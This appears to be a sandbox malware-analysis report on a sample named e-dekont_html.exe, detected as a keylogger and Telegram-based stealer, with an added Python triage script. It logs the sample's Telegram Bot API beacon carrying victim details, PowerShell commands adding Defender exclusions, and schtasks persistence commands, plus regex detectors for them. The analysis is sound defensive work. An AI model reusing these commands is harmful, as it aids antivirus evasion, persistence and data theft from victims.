Host: reallyfreegeoip.org
2024-11-20 06:52:26 UTC | 858 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:26 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 49455
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQIMMFRdFEWMor4585O%2BllXA2a2ulZPE8h9sOty0rTSLIbQ6tI50SEOVYMyNoJdL%2FR%2F1AlqFejMR%2FGMlUWBIHLeXvMV29LHeyW1DPFtmKb%2FiKNXZfepXd%2FRxfUZ5ARjKRqAc47S%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5684671ae815d7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1792510&cwnd=225&unsent_bytes=0&cid=56bf3b6112d8ab0e&ts=137&x=0"
2024-11-20 06:52:26 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 61280 | 188.114.96.34 | 443 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:26 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-20 06:52:26 UTC | 850 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:26 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 49455
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKlHiy3nvCs7kJHZ1eyDlrhDapP8HpIdBUasjHKtKkFEQ%2F4fTpZ04UuZTUz3qNTkLLsdr36LcDRRBjCGSP9uUXsR%2FRF5YSx0lcc0CKtzamje7mSook2S%2FEwXzYxEkMK4hcs87HWE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5684685a1143f4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1538&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1825000&cwnd=186&unsent_bytes=0&cid=f005cf963368936d&ts=157&x=0"
2024-11-20 06:52:26 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
14          192.168.2.4  61282        149.154.167.220  443               7308  C:\Users\user\Desktop\e-dekont_html.exe

Timestamp                Bytes  Direction  Data
2024-11-20 06:52:27 UTC  349    OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
  Host: api.telegram.org
  Connection: Keep-Alive
2024-11-20 06:52:27 UTC  344    IN         HTTP/1.1 404 Not Found
  Server: nginx/1.18.0
  Date: Wed, 20 Nov 2024 06:52:27 GMT
  Content-Type: application/json
  Content-Length: 55
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-20 06:52:27 UTC  55     IN         Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
15          192.168.2.4  61283        188.114.96.3     443               7696  C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp                Bytes  Direction  Data
2024-11-20 06:52:27 UTC  60     OUT        GET /xml/8.46.123.75 HTTP/1.1
  Host: reallyfreegeoip.org
2024-11-20 06:52:27 UTC  854    IN         HTTP/1.1 200 OK
  Date: Wed, 20 Nov 2024 06:52:27 GMT
  Content-Type: text/xml
  Content-Length: 361
  Connection: close
  Cache-Control: max-age=31536000
  CF-Cache-Status: HIT
  Age: 49456
  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asVqlQbAXwFi7Annt5%2FIt7y8oH8RV%2BHp9%2BrkBbv1AJx8pXwSY2TB%2B4z8NLL2467SJK1VuT19juMkdRTHuAElBWvT%2B8kvVmDWP38CnFmjOcXZWVjjfVTCYyf7SaISy6xXjyYoVPkc"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8e5684700d128c8a-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2009&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1461461&cwnd=247&unsent_bytes=0&cid=bc4ebf3307c71e9e&ts=157&x=0"
2024-11-20 06:52:27 UTC  361    IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
16          192.168.2.4  61285        188.114.96.3     443               7696  C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp                Bytes  Direction  Data
2024-11-20 06:52:29 UTC  84     OUT        GET /xml/8.46.123.75 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2024-11-20 06:52:29 UTC  852    IN         HTTP/1.1 200 OK
  Date: Wed, 20 Nov 2024 06:52:29 GMT
  Content-Type: text/xml
  Content-Length: 361
  Connection: close
  Cache-Control: max-age=31536000
  CF-Cache-Status: HIT
  Age: 49458
  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QFIbALN%2BRX8eCytwoQtsteFiR1mvMPAldWmAJCUvnxAJZlZLiB3heP1aBLMtpBRXiOY9C0l3At3MBQKr%2FDLlqzcuIHhF5%2FijfLCHNZxUilUBD5VmprxJCelaqeXBg3zAFuk8%2Fsiu"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8e56847dbff24399-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2350&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1145996&cwnd=238&unsent_bytes=0&cid=aac13ba7e933901f&ts=151&x=0"
2024-11-20 06:52:29 UTC  361    IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
17          192.168.2.4  61287        188.114.96.3     443               7696  C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp                Bytes  Direction  Data
2024-11-20 06:52:30 UTC  84     OUT        GET /xml/8.46.123.75 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2024-11-20 06:52:31 UTC  847    IN         HTTP/1.1 200 OK
  Date: Wed, 20 Nov 2024 06:52:31 GMT
  Content-Type: text/xml
  Content-Length: 361
  Connection: close
  Cache-Control: max-age=31536000
  CF-Cache-Status: HIT
  Age: 49460
  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAmUmLbKs2MIXClBD0V1PoSZ13pNlqmc1rOI4nrH2rkZ1WqK2XgL6Jh93fclylOvtpFrcJQSlhVHtht5ka19dfp%2FURbwmgq3PoHfgUEici07qKcrYVmF13aRe2%2F1PSw6c8gsbC3v"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8e568485d9717292-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1968&sent=6&recv=6&lost=0&retrans=1&sent_bytes=4240&recv_bytes=698&delivery_rate=235737&cwnd=253&unsent_bytes=0&cid=d19b7feee4aa9e1e&ts=168&x=0"
2024-11-20 06:52:31 UTC  361    IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
18          192.168.2.4  61289        188.114.96.3     443               7696  C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp                Bytes  Direction  Data
2024-11-20 06:52:32 UTC  84     OUT        GET /xml/8.46.123.75 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2024-11-20 06:52:32 UTC  850    IN         HTTP/1.1 200 OK
  Date: Wed, 20 Nov 2024 06:52:32 GMT
  Content-Type: text/xml
  Content-Length: 361
  Connection: close
  Cache-Control: max-age=31536000
  CF-Cache-Status: HIT
  Age: 49461
  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KbcABO6sp%2Fb4cdgPQOA9vqXAkHYdK1%2Ftfzxh1dCrS0PNeVKdFRTWkPuz7%2BEPHqsEcOEsH6Vm1ZPwLkuzRYjQo5k66afu4cU1DvDL1BPNNEt7YStrgTX40Aoxl3YLnVCZwS9pBgE"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8e56848cc9d4c463-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1931216&cwnd=159&unsent_bytes=0&cid=64719943dae0da0f&ts=155&x=0"
2024-11-20 06:52:32 UTC  361    IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        19192.168.2.461290149.154.167.2204437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
Timestamp                 Bytes  Direction  Data
2024-11-20 06:52:32 UTC   349    OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: Keep-Alive
2024-11-20 06:52:33 UTC   344    IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0
                                            Date: Wed, 20 Nov 2024 06:52:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 55
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-20 06:52:33 UTC   55     IN         Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}
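The request above goes to the Telegram Bot API with an empty bot token in the path (/bot/sendMessage rather than /bot<token>/sendMessage) and an empty chat_id, which is consistent with the 404 Not Found the API returned. As an added example (not Joe Sandbox code and not code from the sample), the Python below decodes that beacon into its fields and scans the command lines from the process list in this report for the two behaviours the report flags: a Defender exclusion added for a binary that runs in the same trace, and a scheduled task created from an XML file in %Temp%. The request line and command lines are copied from this report; every constant and function name is my own.

```python
"""Triage helpers for the observables in this report. Added example: this is
neither Joe Sandbox code nor code from the sample. The inputs are copied from
the report's HTTP stream and process list; all helper names are my own."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the report: the request line the sample sent to api.telegram.org.
TELEGRAM_REQUEST_LINE = (
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0A"
    "Date%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20"
    "United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you"
    "%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D"
    " HTTP/1.1"
)

# Constructed from the report's process list: (Target ID, image path, command line).
PROCESSES = [
    (0, r"C:\Users\user\Desktop\e-dekont_html.exe",
     r'"C:\Users\user\Desktop\e-dekont_html.exe"'),
    (2, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference'
     r' -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"'),
    (4, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference'
     r' -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"'),
    (6, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo"'
     r' /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"'),
    (9, r"C:\Users\user\AppData\Roaming\fahKSvwo.exe",
     r"C:\Users\user\AppData\Roaming\fahKSvwo.exe"),
    (11, r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo"'
     r' /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"'),
]

# Bot API paths look like /bot<token>/<method>; an empty token is itself a finding.
BOT_API_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>\w+)$")
DEFENDER_EXCLUSION = re.compile(
    r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/Create\b', re.I)
TASK_NAME = re.compile(r'/TN\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_XML = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.I)
TEMP_DIR = "\\appdata\\local\\temp\\"  # lower-cased fragment of %LOCALAPPDATA%\Temp\


def parse_telegram_beacon(request_line):
    """Decode a Telegram Bot API request line: which method, whether a bot token
    is present in the path, the chat_id, and the 'Key: value' lines of the text."""
    _verb, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    m = BOT_API_PATH.match(url.path)
    if m is None:
        return None
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    fields = {}
    for line in query.get("text", [""])[0].splitlines():
        line = line.strip()
        if ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {"method": m.group("method"), "token_present": bool(m.group("token")),
            "chat_id": query.get("chat_id", [""])[0], "fields": fields}


def _arg(match):
    """Value of a quoted-or-bare argument captured by the regexes above."""
    return None if match is None else (match.group(1) or match.group(2))


def triage_processes(processes):
    """Flag Defender exclusions and scheduled-task creation in process command
    lines; an exclusion that covers a binary executed in the same trace, or a
    task built from an XML file in %Temp%, is reported as such."""
    executed = {path.lower() for _, path, _ in processes}
    findings = []
    for target, _path, cmdline in processes:
        excl = DEFENDER_EXCLUSION.search(cmdline)
        if excl:
            value = _arg(excl)
            findings.append({"target": target, "rule": "defender_exclusion_added",
                             "value": value,
                             "covers_executed_binary": value.lower() in executed})
        if TASK_CREATE.search(cmdline):
            xml = _arg(TASK_XML.search(cmdline))
            from_temp = xml is not None and TEMP_DIR in xml.lower()
            findings.append({"target": target,
                             "rule": "scheduled_task_from_temp" if from_temp
                             else "scheduled_task_created",
                             "value": _arg(TASK_NAME.search(cmdline)), "xml": xml})
    return findings


if __name__ == "__main__":
    print(parse_telegram_beacon(TELEGRAM_REQUEST_LINE))
    for finding in triage_processes(PROCESSES):
        print(finding)
```

Run as-is it decodes the beacon's PC Name, Date and Time and Country Name fields, reports that no bot token and no chat_id were sent, and returns four findings: the two exclusions (both covering binaries that execute in this trace, Target IDs 0/8 and 9) and the two task creations from tmp files in the user's Temp directory. The same two regex rules apply unchanged to EDR process-creation telemetry, which is where the Sigma rules named in the signature list would be evaluated.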

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:01:52:04
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\e-dekont_html.exe"
                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5 hash:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:01:52:07
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                                                                                                                                                        Imagebase:0x5a0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:01:52:07
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:01:52:08
                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                                                                                                                                                        Imagebase:0x5a0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
